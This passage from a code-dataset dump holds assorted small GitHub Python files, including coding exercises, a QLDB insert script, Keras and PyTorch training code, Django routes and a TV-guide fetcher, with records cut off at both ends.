// 2:\n break\n if number % prime == 0:\n return False\n return True\n\n # Check if last_number is prime using check_known_prime\n if check_known_prime(last_number):\n # Append last_number to 'primeoutputgpt.txt'\n with open('primeoutputgpt.txt', 'a') as file:\n file.write(f' {last_number}')\n\n # Restart the loop to continue checking the next number\n","repo_name":"ciwen3/Public","sub_path":"Python/Prime-Counter/ready/countingprimeswithpython.py","file_name":"countingprimeswithpython.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22276646236","text":"N = int(input())\n\nfor i in range(N):\n sum = i\n numlist = list(str(i))\n for num in numlist:\n sum += int(num)\n if sum == N:\n print(i)\n break\nelse:\n print(0)","repo_name":"cheon4050/CodingTest-Study","sub_path":"02주차/2231/kodongcheon.py","file_name":"kodongcheon.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32940930580","text":"from logging import basicConfig, getLogger, INFO\nfrom sampledata.input_data import SampleData\nfrom constants import Constants\nfrom sampledata.sample_data import convert_object_to_ion, get_document_ids_from_dml_results\nfrom connect_to_ledger import create_qldb_driver\n\nlogger = getLogger(__name__)\nbasicConfig(level=INFO)\n\n\ndef update_person_id(document_id):\n \"\"\"\n Update the PersonId value for DriversLicense records and the PrimaryOwner value for VehicleRegistration records.\n :type document_ids: list\n :param document_ids: List of document IDs.\n :rtype: list\n :return: Lists of updated DriversLicense records and updated VehicleRegistration records.\n \"\"\"\n new_sc_entity = SampleData.SCENTITY.copy()\n \n new_sc_entity[0][\"PersonIds\"].append(document_id)\n # logger.info(new_sc_entity)\n return new_sc_entity\n\ndef insert_documents(transaction_executor, table_name, documents):\n \"\"\"\n Insert the given list of documents into a table in a single transaction.\n :type transaction_executor: :py:class:`pyqldb.execution.executor.Executor`\n :param transaction_executor: An Executor object allowing for execution of statements within a transaction.\n :type table_name: str\n :param table_name: Name of the table to insert documents into.\n :type documents: list\n :param documents: List of documents to insert.\n :rtype: list\n :return: List of documents IDs for the newly inserted documents.\n \"\"\"\n # logger.info('Inserting some documents in the {} table...'.format(table_name))\n statement = 'INSERT INTO {} ?'.format(table_name)\n cursor = transaction_executor.execute_statement(statement, convert_object_to_ion(documents))\n list_of_document_ids = get_document_ids_from_dml_results(cursor)\n \n return list_of_document_ids\n\n\ndef update_and_insert_documents(transaction_executor):\n \"\"\"\n Handle the insertion of documents and updating PersonIds all in a single transaction.\n :type transaction_executor: :py:class:`pyqldb.execution.executor.Executor`\n :param transaction_executor: An Executor object allowing for execution of statements within a transaction.\n \"\"\"\n admin_id = insert_documents(transaction_executor, Constants.PERSON_TABLE_NAME, SampleData.PERSON)\n\n logger.info(\"Updating PersonIds for 'SCENTITY' ...\")\n new_sc_entity = update_person_id(admin_id[0])\n\n mcg_id = insert_documents(transaction_executor, Constants.SCENTITY_TABLE_NAME, new_sc_entity)\n\n return admin_id[0], 
mcg_id[0]\n \n \n\nif __name__ == '__main__':\n \"\"\"\n Insert documents into a table in a QLDB ledger.\n \"\"\"\n try:\n with create_qldb_driver() as driver:\n # An INSERT statement creates the initial revision of a document with a version number of zero.\n # QLDB also assigns a unique document identifier in GUID format as part of the metadata.\n driver.execute_lambda(lambda executor: update_and_insert_documents(executor),\n lambda retry_attempt: logger.info('Retrying due to OCC conflict...'))\n logger.info('Documents inserted successfully!')\n except Exception:\n logger.exception('Error inserting or updating documents.')\n","repo_name":"anadi2311/MCG_QLDB","sub_path":"src/insert_document.py","file_name":"insert_document.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22503103982","text":"\"\"\"\nThe linecache module allows one to get any line from a Python source file, while attempting to optimize internally,\n using a cache, the common case where many lines are read from a single file. This is used by the traceback module\n to retrieve source lines for inclusion in the formatted traceback.\n\"\"\"\nimport linecache\n\nfile = r\"C:\\Users\\20106\\PycharmProjects\\intermediate-python3\\Files and Paths Modules\\testes\\linecash.txt\"\n\nline = linecache.getline(filename=file, lineno=10)\n\nprint(line)\n\nlinecache.checkcache(filename=file)\n","repo_name":"mo-a1/intermediate-python3","sub_path":"Python Standard Library/File and Directory Access/linecash_module.py","file_name":"linecash_module.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38062671925","text":"import matplotlib.pyplot as Matplot\nimport numpy as np\nimport os\nimport neuralNetwork as nn\n\n\n\ndef testAccuracy(y_pred, y_actual):\n accuracy =np.sum(y_actual==y_pred)/len(y_actual)\n return accuracy\n\ndef logLoss(pred, label):\n epsilon = 1e-15\n pred = np.clip(pred, epsilon, 1 - epsilon)\n i=0\n i=(-label*np.log(pred) - (1-label)*np.log(1-pred))\n return i\n\ndef plotErrors(l):\n Matplot.plot(l, [x for x in range(len(l))])\n Matplot.xlabel('iterations')\n Matplot.ylabel('logloss')\n Matplot.title('error')\n\n Matplot.show()\n\n return\n\ndef visualData(mat,ylist, perceptron):\n \n fig = Matplot.figure()\n ax = fig.add_subplot(1, 1, 1)\n Matplot.scatter(mat[:, 0], mat[:, 1], marker=\"o\", c=ylist)\n\n x0_1 = np.amin(mat[:, 0])\n x0_2 = np.amax(mat[:, 0])\n\n x1_1 = (-perceptron.weights[0] * x0_1 - perceptron.bias) / perceptron.weights[1]\n x1_2 = (-perceptron.weights[0] * x0_2 - perceptron.bias) / perceptron.weights[1]\n\n ax.plot([x0_1, x0_2], [x1_1, x1_2], \"k\")\n\n ymin = np.amin(mat[:, 1])\n ymax = np.amax(mat[:, 1])\n ax.set_ylim([ymin - 3, ymax + 3])\n\n Matplot.xlabel('meep')\n Matplot.ylabel('morp')\n Matplot.title('Data')\n\n Matplot.show()\n\n\n return \n\ndef makePoints(l):\n ret=[]\n for x in l:\n x_c=0\n y_c=0\n s=x.split(\" \")\n for i in s:\n if i==\"meep\":\n x_c+=1\n elif i==\"morp\":\n y_c+=1\n ret.append([x_c,y_c])\n ret= np.array(ret)\n \n return ret\n\n\ndef dataParser(dataFile):\n dataList=[]\n with open(dataFile,\"r\", encoding=\"utf-8\") as f:\n for line in f:\n l=line.split(\" 00\")\n l[1]=l[1].strip(\"\\n\")\n dataList.append(l)\n return dataList\n\ndef unlabelData(l):\n unLabeled= [x[0] for x in l]\n normalizedLabel=np.array([0 if x[1]== \"sad\" else 1 for x in l])\n return unLabeled, 
normalizedLabel\n\ndef showData(data,labels):\n fig = Matplot.figure()\n ax = fig.add_subplot(1, 1, 1)\n data=np.array(data)\n Matplot.scatter(data[:, 0], data[:, 1], marker=\"o\", c=labels)\n Matplot.xlabel('meep')\n Matplot.ylabel('morp')\n Matplot.title('Data')\n\n Matplot.show()\n\n\n return\n\n\n\ndef main():\n #data uploading and parsing from alienGen.py \n trainDataList, trainLabelList = unlabelData(dataParser(os.path.join(os.getcwd(),\"ForwardPassNN\\data\\dataBatch1.txt\")))\n\n testDataList, testLabelList= unlabelData(dataParser(os.path.join(os.getcwd(),\"ForwardPassNN\\data\\dataBatch.txt\")))\n\n trainData= makePoints(trainDataList)\n\n testData= makePoints(testDataList)\n\n #init network\n Fn= nn.FeedForwardNN(2,[2,1])\n\n #plot data\n showData(trainData,trainLabelList)\n\n #training\n tup=Fn.train([trainData,trainLabelList])\n\n predictions= Fn.predict(testData)[0]\n \n #accuracy testing\n accuracy=testAccuracy(nn.sigmoid_step(predictions),testLabelList)\n \n print(tup)\n print(accuracy)\n #print(predictions[-10:-1])\n \n\n #visualData(trainData, trainLabelList, Lp)\n #plotErrors(Fn.error)\n \n return \"done\"\n\nprint(main())","repo_name":"Di0nigi/DeepLearningClass","sub_path":"ForwardPassNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70570612200","text":"# Exam Preparation\r\n\r\n# ⦁	On the first line - the number of unsatisfactory marks - an integer;\r\n# ⦁	After that, two lines are read repeatedly:\r\n# ⦁	Task name – text;\r\n# ⦁	Mark - an integer in the range [2…6]\r\n\r\nlow_marks_count = int(input())\r\ninitial_low_marks = low_marks_count\r\nmarks_sum = 0\r\nmarks_count = 0\r\nis_enough_tasks = False\r\nis_low_marks_reached = False\r\ncurrent_task_name = None\r\n\r\ntask_name = input()\r\nwhile not is_enough_tasks:\r\n\r\n if task_name == \"Enough\":\r\n is_enough_tasks = True\r\n continue\r\n\r\n current_task_name = task_name\r\n current_mark = int(input())\r\n\r\n if current_mark <= 4:\r\n low_marks_count -= 1\r\n if low_marks_count == 0:\r\n is_low_marks_reached = True\r\n break\r\n\r\n marks_sum += current_mark\r\n marks_count += 1\r\n task_name = input()\r\n\r\nif is_enough_tasks:\r\n print(f\"Average score: {marks_sum / marks_count :.2f}\")\r\n print(f\"Number of problems: {marks_count}\")\r\n print(f\"Last problem: {current_task_name}\")\r\nelif is_low_marks_reached:\r\n print(f\"You need a break, {initial_low_marks} poor grades.\")\r\n","repo_name":"pySin/SoftUni-Software-Engineering","sub_path":"Python-Programming-Basics/while-loop/exam_preparation.py","file_name":"exam_preparation.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30320007094","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nimport web\nimport os\nimport sys\n\nif not u'../' in sys.path:\n sys.path.append(u'../')\n\nfrom control import *\n\nurls = (\n u'/', u'index', # show the thread list\n u'/thread', u'mythread', # create a thread\n u'/res', u'res', # create and show replies\n u'/error', u'error', # show errors\n u'/(.*)', u'index', # anything not matched falls back to the thread list\n )\n\ndef main():\n app = web.application(urls, globals())\n app.run()\n\n\nif __name__ == u'__main__':\n 
main()\n","repo_name":"GunioRobot/learning-web.py","sub_path":"test03/web/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37981363889","text":"def mergesort(arr):\n\n return mergeSort(arr,0,len(arr)-1) #recursion function\n\ndef mergeSort(arr,low,high):\n \n if low >= high: #base condition for recursion\n return 0\n \n mid = (low+high)//2\n # print(mid,'mid')\n left_data = mergeSort(arr,low,mid) #partion of left data and count the inversion upto mid point\n # print(\"left_data \",left_data)\n right_data = mergeSort(arr,mid+1,high) #partion of right data and count the inverison upto right point\n # print(\"right_data \",right_data)\n merge_both = merge(arr,low,mid,high) #merge both merge points\n # print(\"both \",merge_both)\n\n total_count = left_data + right_data + merge_both\n\n return total_count \n\n\ndef merge(arr,low,mid,high):\n i = low #low part\n j = mid+1 #low part for right parition\n k = 0 #k id 0 for temp array lengh\n count = 0\n temp = [0 for i in range(high-low+1)] #make a temp array for put the both merge data\n print(i,j,mid,len(temp))\n\n while i <= mid and j <= high:\n # print(i,j,'ij')\n if arr[i] < arr[j]: #if left data is less than put into temp\n temp[k] = arr[i]\n i += 1\n k += 1\n # print(temp,'temp1')\n else:\n temp[k] = arr[j] #if right data is less than put into temp\n j += 1\n print(mid,i) \n count += mid -i +1 #because inversion happen when right array data move to first so \n k += 1\n # print(temp,'temp2')\n \n \n while i <= mid: #bache hue element dal do temp m \n temp[k] = arr[i]\n i += 1\n k += 1\n # print(temp,'temp1')\n \n while j <= high:\n temp[k] = arr[j]\n j += 1\n k += 1\n # print(temp,'temp2')\n \n print(temp,count,low,high)\n # Copy the sorted subarray into Original array\n k = 0\n for z in range(low,high+1):\n arr[z] = temp[k]\n k += 1\n\n \n # print(arr)\n\n \n return count\n\narr = [1, 20, 6, 4, 5] #[4, 2, 1,3] #[3,8]\n#arr = [3, 8, 6, 4, 2, 1]\nmergesort(arr)\n","repo_name":"aviTak/dsa-interview-prep","sub_path":"Arrays/Count Inversion/countinversion.py","file_name":"countinversion.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23906557509","text":"#------------------- combinatorial.py -------------------#\nfrom operator import mul, add, truth\napply_each = lambda fns, args=[]: map(apply, fns, [args]*len(fns))\nbools = lambda lst: map(truth, lst)\nbool_each = lambda fns, args=[]: bools(apply_each(fns, args))\nconjoin = lambda fns, args=[]: reduce(mul, bool_each(fns, args))\nall = lambda fns: lambda arg, fns=fns: conjoin(fns, (arg,))\nboth = lambda f,g: all((f,g))\nall3 = lambda f,g,h: all((f,g,h))\nand_ = lambda f,g: lambda x, f=f, g=g: f(x) and g(x)\ndisjoin = lambda fns, args=[]: reduce(add, bool_each(fns, args))\nsome = lambda fns: lambda arg, fns=fns: disjoin(fns, (arg,))\neither = lambda f,g: some((f,g))\nanyof3 = lambda f,g,h: some((f,g,h))\ncompose = lambda f,g: lambda x, f=f, g=g: f(g(x))\ncompose3 = lambda f,g,h: lambda x, f=f, g=g, h=h: f(g(h(x)))\nident = lambda x: x\n","repo_name":"toocheap/python-samples","sub_path":"combinatorial.py","file_name":"combinatorial.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74016549481","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: 
Duo\nimport pickle\n\ndef greeting(name):\n print(\"hi %s\"%name)\n\ninfo = {\n 'name' : 'Duo Zhang',\n 'age':27,\n 'school':'Marquette',\n 'func':greeting\n}\n# pickle writes binary data, so the file must be opened with 'wb' (write binary)\nf = open('test2.txt','wb')\n\n# pickle.dump can directly take the object to write (dict, list, etc.) and the opened file\n# dump(obj, file) writes directly\npickle.dump(info,f)\n# dumps requires calling f.write to do the writing\n# f.write(pickle.dumps(info))\nf.close()","repo_name":"AlexDuo/DuoPython","sub_path":"Decorator/Pickle_Serialization2.py","file_name":"Pickle_Serialization2.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73478948521","text":"from django.contrib import admin\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom power import views\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularRedocView,\n SpectacularSwaggerView,\n)\n\ndetail_actions = {\n \"get\": \"retrieve\",\n \"put\": \"update\",\n \"delete\": \"destroy\",\n \"patch\": \"partial_update\",\n}\n\nlist_actions = {\n \"get\": \"list\",\n \"post\": \"create\",\n}\n\nurlpatterns = [\n path(\"api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\"\", SpectacularSwaggerView.as_view(url_name=\"schema\"), name=\"swagger-ui\"),\n path(\"redoc/\", SpectacularRedocView.as_view(url_name=\"schema\"), name=\"redoc\"),\n path(\"boats/\", views.BoatViewSet.as_view(actions=list_actions)),\n path(\n \"boats/<int:pk>/\",\n views.BoatViewSet.as_view(actions=detail_actions),\n ),\n path(\n \"engines/\",\n views.EngineViewSet.as_view(actions=list_actions),\n ),\n path(\n \"engines/<int:pk>/\",\n views.EngineViewSet.as_view(actions=detail_actions),\n ),\n path(\n \"boatengines/\",\n views.BoatEngineViewSet.as_view(actions=list_actions),\n ),\n path(\n \"boatengines/<int:pk>/\",\n views.BoatEngineViewSet.as_view(actions=detail_actions),\n ),\n path(\"admin/\", admin.site.urls),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"RobertBush/marina","sub_path":"marina/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12861089405","text":"import sys\n\nfrom classes.workExperience import WorkExperience\nfrom classes.skillCategory import SkillCategory\nfrom classes.imageCategory import ImageCategory\nfrom classes.education import Education\nfrom classes.other import Other\nfrom classes.userData import UserData\n\nclass Controller:\n collection = None\n exitNumber = 7\n\n def __init__(self, database):\n self.database = database\n\n def pickCollection(self, option):\n if option == 1:\n if not isinstance(self.collection, WorkExperience):\n self.collection = WorkExperience('Work Experience', 'experiences', self.database)\n self.collection.showOptions()\n elif option == 2:\n if not isinstance(self.collection, SkillCategory):\n self.collection = SkillCategory('Skill Categories', 'skillcategories', self.database)\n self.collection.showOptions()\n elif option == 3:\n if not isinstance(self.collection, ImageCategory):\n self.collection = ImageCategory('Image Categories', 'imagecategories', self.database)\n self.collection.showOptions()\n elif option == 4:\n if not isinstance(self.collection, Education):\n self.collection = Education('Education', 'educations', self.database)\n self.collection.showOptions()\n elif option == 5:\n if not isinstance(self.collection, Other):\n self.collection = Other('Other', 
'others', self.database)\n self.collection.showOptions()\n elif option == 6:\n if not isinstance(self.collection, UserData):\n self.collection = UserData('User Data', 'userdatas', self.database)\n self.collection.showOptions()\n elif option == self.exitNumber:\n print(\"Exiting...\")\n sys.exit()\n else:\n print(\"\\nERROR : Invalid option.\")\n \n def showMenu(self):\n print(\"\\nWhat collection you want to work with today?\\n\")\n print(\"1. Work Experiences.\")\n print(\"2. Skills Categories.\")\n print(\"3. Image Categories.\")\n print(\"4. Education.\")\n print(\"5. Other.\")\n print(\"6. User Data.\")\n print(\"{}. Exit program.\".format(self.exitNumber))\n\n\n\n\n\n","repo_name":"Vinesma/portfolio-website-v2","sub_path":"dbHelper/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42235854433","text":"# -*- coding:utf-8 -*-\nimport numpy as np\nimport time\nfrom keras.utils import to_categorical\nfrom keras.layers import Conv1D, GRU, GlobalAveragePooling1D, Activation, Flatten, Dropout, Dense, MaxPool1D\nfrom keras.models import Sequential\nimport scipy.io\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nmin_max_scaler = preprocessing.MinMaxScaler()\ndata_all = scipy.io.loadmat('C1.mat')['data'].reshape(3600,992)\ndf_all = min_max_scaler.fit_transform(data_all)\nlabel = scipy.io.loadmat('df_label.mat')['label'].reshape(-1)\ndf_all = df_all.reshape(3600,16,62)\n'''\n# Randomly split into train and test sets\nindex=np.ones(3600)\nfor i in range(3600):\n index[i]=i\nnp.random.shuffle(index)\nindex=index.astype('int64')\nindex_train=index[0:2800]\nindex_test=index[2800:]\n\nx_total = df_all[index_train]\ny_total = label[index_train]\n\nx_test = df_all[index_test]\ny_test = label[index_test]\n\nx_train, x_valid, y_train, y_valid = train_test_split(x_total, y_total, test_size = 0.2, random_state = 1)\n\ny_train = to_categorical(y_train, num_classes = 3)\ny_test = to_categorical(y_test, num_classes = 3)\ny_valid = to_categorical(y_valid, num_classes = 3)\n'''\n# Use five-fold cross-validation\nskf = StratifiedKFold(n_splits=5)\nfor index_train, index_test in skf.split(df_all, label):\n \n # start timing\n start = time.clock()\n \n x_total = df_all[index_train]\n x_test = df_all[index_test]\n y_total = label[index_train]\n y_test = label[index_test]\n \n print('x_train shape:', x_total.shape)\n print(x_total.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n \n x_train, x_valid, y_train, y_valid = train_test_split(x_total, y_total, test_size = 0.1, random_state = 1)\n\n y_test = np.expand_dims(y_test, axis = 1)\n y_test = to_categorical(y_test, num_classes = 3)\n y_train = to_categorical(y_train, num_classes = 3)\n y_valid1 = np.expand_dims(y_valid, axis = 1)\n y_valid3 = to_categorical(y_valid, num_classes = 3)\n\n\n# Build a network: convolution followed by GRU\n'''\nmodel = Sequential()# stack the model layers linearly\nmodel.add(Conv1D(256, 3, input_shape=(16,62))) # add a 1D convolution layer\nmodel.add(Activation('relu'))\nmodel.add(MaxPool1D(pool_size=2))\nmodel.add(GRU(256, dropout=0.2, recurrent_dropout=0.1, return_sequences=True))# recurrent layers after the convolution\nmodel.add(GRU(256, dropout=0.2, recurrent_dropout=0.1))\nmodel.add(Dense(3))\nmodel.add(Activation('sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='RMSprop', metrics=['accuracy'])\n'''\n\n# Build a 1D convolutional network\nmodel_m = Sequential()\nmodel_m.add(Conv1D(100, 3, activation='relu', input_shape=(16,62)))\n#model_m.add(Conv1D(100, 3, activation='relu'))\nmodel_m.add(MaxPool1D(2))\nmodel_m.add(Conv1D(160, 
3, activation='relu'))\n#model_m.add(Conv1D(160, 1, activation='relu'))\nmodel_m.add(GlobalAveragePooling1D())\nmodel_m.add(Dropout(0.5))\nmodel_m.add(Dense(3, activation='softmax'))\nmodel_m.compile(loss='binary_crossentropy', optimizer='RMSprop', metrics=['accuracy'])\n\n\nscore1=np.ones(2)\nfor epoch in range(30):\n print('epoch:',epoch+1)\n model_m.fit(x_train, y_train, batch_size=10, epochs=2,verbose=1,\n validation_data=(x_valid,y_valid3))\n #model.fit(x_train, y_train, batch_size=10, epochs=2,verbose=0,\n #validation_data=(x_valid,y_valid3))\n score = model_m.evaluate(x_test, y_test, batch_size=10)\n print(score)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Song-zhenzhen/EEG_emotion_classification_use_CNN-and-RNN","sub_path":"CNN+RNN.py","file_name":"CNN+RNN.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"18"} +{"seq_id":"29670552397","text":"import torch\nimport numpy as np \nfrom torch.utils.data import Dataset, DataLoader\nfrom pycocotools.coco import COCO\nimport cv2\n\nclass dataset(Dataset):\n def __init__(self, image_folder, annotation_file):\n self.images = image_folder\n self.annotations = annotation_file\n\n self.coco = COCO(self.annotations)\n self.catId = self.coco.getCatIds(catNms = ['person'])\n\n self.imgIds = self.coco.getImgIds(catIds = self.catId)\n \n def __len__(self):\n return len(self.imgIds)\n\n def __getitem__(self, id):\n # print('yahan baar baar nahi aana chahiye')\n print(self.imgIds[id])\n img = self.coco.loadImgs(self.imgIds[id])[0]\n img_name = img['file_name']\n # print(img_name)\n X = np.array(cv2.imread(self.images + str(img_name)))\n height = X.shape[0]\n width = X.shape[1]\n # print(height, width)\n X = cv2.resize(X,(224, 224))\n # print(X.shape)\n X = X.transpose([2,0,1])\n annIds = self.coco.getAnnIds(imgIds=img['id'], catIds=self.catId, iscrowd=None)\n anns = self.coco.loadAnns(annIds)\n y = anns[0]['keypoints']\n y = np.array(y)\n # print(y)\n for i in range(17):\n y[3*i] = 224*1.0/width * y[3*i]\n y[3*i + 1] = 224*1.0/height * y[3*i + 1]\n # print(y)\n return X, y\ndata_train = dataset('coco/images/', 'coco/annotations/person_keypoints_train2014.json')\ntrain_loader = DataLoader(data_train, batch_size = 8, shuffle = True)\nprint(len(train_loader))\ndata_train.__getitem__(5)\n\n\n ","repo_name":"agarwalsiddhant10/torch-models","sub_path":"keypoint_detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25008655968","text":"from django.db import models\nfrom datetime import datetime\nimport json\n\n# Create your models here.\n\nclass Camera(models.Model):\n statusTemplate = {\n \"summary\": \"notfound\", # one of \"notfound\", \"off\", \"on\", or \"recording\"\n \"raw\": {}\n }\n name = models.CharField(max_length=255)\n ssid = models.CharField(max_length=255)\n password = models.CharField(max_length=255)\n date_added = models.DateTimeField(auto_now_add=True)\n last_attempt = models.DateTimeField(auto_now=True) \n last_update = models.DateTimeField(null=True, blank=True)\n image = models.TextField(blank=True)\n status = models.TextField(blank=True) # status template above is defined by GoProController.py\n def save(self, *args, **kwargs):\n if not self.pk:\n self.status = json.dumps(self.statusTemplate)\n self.last_attempt = datetime(2002, 6, 1) # what's this date?! 
;)\n super(Camera, self).save(*args, **kwargs)\n else:\n super(Camera, self).save(*args, **kwargs)\n def __unicode__(self):\n return self.name\n\nclass CameraCommand(models.Model):\n COMMANDS = (\n ('power_off', 'Power Off'),\n ('power_on', 'Power On'),\n ('record_off', 'Record Off'),\n ('record_on', 'Record On'),\n ('mode_video', 'Mode Video'),\n ('mode_still', 'Mode Still'),\n )\n camera = models.ForeignKey(Camera)\n command = models.CharField(max_length=255, choices=COMMANDS) # command list above is defined by GoProController.py\n date_added = models.DateTimeField(auto_now_add=True)\n time_completed = models.DateTimeField(null=True, blank=True)\n def __unicode__(self):\n return self.camera.__unicode__() + ' > ' + self.command\n","repo_name":"lolchocotaco/GoPi","sub_path":"GoProSite/GoProApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"25108339220","text":"import guide_data\nimport qboottimer\n\nimport sys\nimport pyschedules.retrieve\nimport threading\nimport signal\nimport shutil\nimport StringIO\n\nimport datetime\nimport dateutil.tz\nimport atomicwrites\nimport multiprocessing\n\nfrom PyQt4 import Qt\n\nlocaltz = dateutil.tz.tzlocal()\n#multiprocessing.set_start_method('spawn')\n\ndef process_run(tmp, result):\n result.put(guide_data.guide_data(tmp))\n\nclass parse_worker(Qt.QThread):\n done = Qt.pyqtSignal(guide_data.guide_data)\n failed = Qt.pyqtSignal()\n\n def __init__(self, filename):\n super(parse_worker, self).__init__()\n self.filename = filename\n\n def start(self, fileobj, initial=False):\n self.fobj = fileobj\n self.initial = initial\n super(parse_worker, self).start(Qt.QThread.IdlePriority)\n\n def run(self):\n try:\n tmp = StringIO.StringIO()\n shutil.copyfileobj(self.fobj, tmp)\n tmp.seek(0)\n result = multiprocessing.Queue()\n p = multiprocessing.Process(target=process_run, args=(tmp, result))\n p.start()\n d = result.get()\n p.join()\n self.done.emit(d)\n if not self.initial:\n tmp.seek(0)\n try:\n with atomicwrites.atomic_write(self.filename, overwrite=True) as out:\n shutil.copyfileobj(tmp, out)\n except:\n pass\n except:\n self.failed.emit()\n finally:\n del self.fobj\n\nclass retrieve_worker(Qt.QThread):\n done = Qt.pyqtSignal(object)\n failed = Qt.pyqtSignal()\n\n def __init__(self, login, duration):\n super(retrieve_worker, self).__init__()\n self.login = login\n self.duration = duration\n\n def run(self):\n try:\n utc_start = datetime.datetime.utcnow()\n utc_stop = utc_start + self.duration\n u, p = self.login\n f = pyschedules.retrieve.get_file_object(u, p, utc_start, utc_stop)\n self.done.emit(f)\n except:\n self.failed.emit()\n\nclass guide_manager(Qt.QObject):\n new_guide = Qt.pyqtSignal(guide_data.guide_data)\n\n def __init__(self, parent, options=None):\n super(guide_manager, self).__init__(parent)\n self.first = True\n\n self.minimum_sched = datetime.timedelta(hours=8)\n self.minimum_fresh = datetime.timedelta(days=1)\n fetch_duration = datetime.timedelta(days=2)\n\n self.filename = options.sched\n self.parse = parse_worker(self.filename)\n self.retrieve = retrieve_worker((options.username, options.password), fetch_duration)\n\n self.parse.done.connect(self.parse_done)\n self.parse.done.connect(self.new_guide)\n self.parse.failed.connect(self.parse_failed)\n self.retrieve.done.connect(self.parse.start)\n self.retrieve.failed.connect(self.retrieve_failed)\n\n self.timer = qboottimer.QBootTimer()\n 
self.timer.setSingleShot(True)\n self.timer.timeout.connect(self.retrieve.start)\n\n Qt.QTimer.singleShot(0, self.parse_first)\n\n def retrieve_failed(self):\n # Wait 5 minutes and try again\n self.timer.start(5 * 60 * 1000)\n\n def parse_first(self):\n try:\n self.parse.start(open(self.filename, 'r'), True)\n except:\n self.parse_failed()\n\n def parse_done(self, f):\n now = datetime.datetime.now(localtz)\n\n # We need at least minimum_sched time of schedule data from now till validTo\n update_time = f.validTo - self.minimum_sched\n minimum_sched_wait = update_time - now\n\n # Schedule data should have been fetched in the past minimum_fresh time\n update_time = f.validFrom + self.minimum_fresh\n fresh_wait = update_time - now\n\n wait = min(minimum_sched_wait, fresh_wait)\n if wait.total_seconds() < 0:\n self.retrieve.start()\n else:\n self.timer.start(wait.total_seconds() * 1000)\n\n def parse_failed(self):\n if self.first:\n self.first = False\n self.retrieve.start(Qt.QThread.IdlePriority)\n else:\n # Wait 5 minutes and try again\n self.timer.start(5 * 60 * 1000)\n","repo_name":"russdill/atropine-tv","sub_path":"guide_manager.py","file_name":"guide_manager.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7535911705","text":"languages = {}\n\nwith open(\"../../../Examples/students.txt\", 'r') as f:\n for line in f:\n line = line.rstrip()\n student, lingos = line.split(\":\")\n lingos = lingos.strip()\n for l in lingos.split(\" \"):\n if l == '':\n continue\n if l in languages:\n languages[l] += 1\n else:\n languages[l] = 1\n\nindex = list(languages.keys())\nindex.sort()\n\nfor i in index:\n print(\"{} : {}\".format(i, languages[i]))\n","repo_name":"HasBob/IntroPython2015","sub_path":"students/iancote/session04/files_lab.py","file_name":"files_lab.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26393798840","text":"import numpy as np\nimport pandas as pd\nimport requests\nfrom io import BytesIO\nfrom datetime import datetime\n\nimport os\nimport random\nfrom back.image_manager import TextImage\n\ndow = [\"Пн\", \"Вт\", \"Ср\", \"Чт\", \"Пт\", \"Сб\", \"Вс\"]\nsf_pairs = [\"900-1030\", \"1040-1210\", \"1240-1410\", \"1420-1550\", \"1620-1750\", \"1800-1930\"]\nstart_date = \"07.02.2022\"\n\ntoday_dow = dow[datetime.now().weekday()]\n\n\ndef get_table(\n CACHED_TABLE_PATH: str = None,\n CACHED_TABLE_NAME: str = None,\n DOWNLOAD_LINK: str = None,\n):\n def download_table(DOWNLOAD_LINK):\n responce = 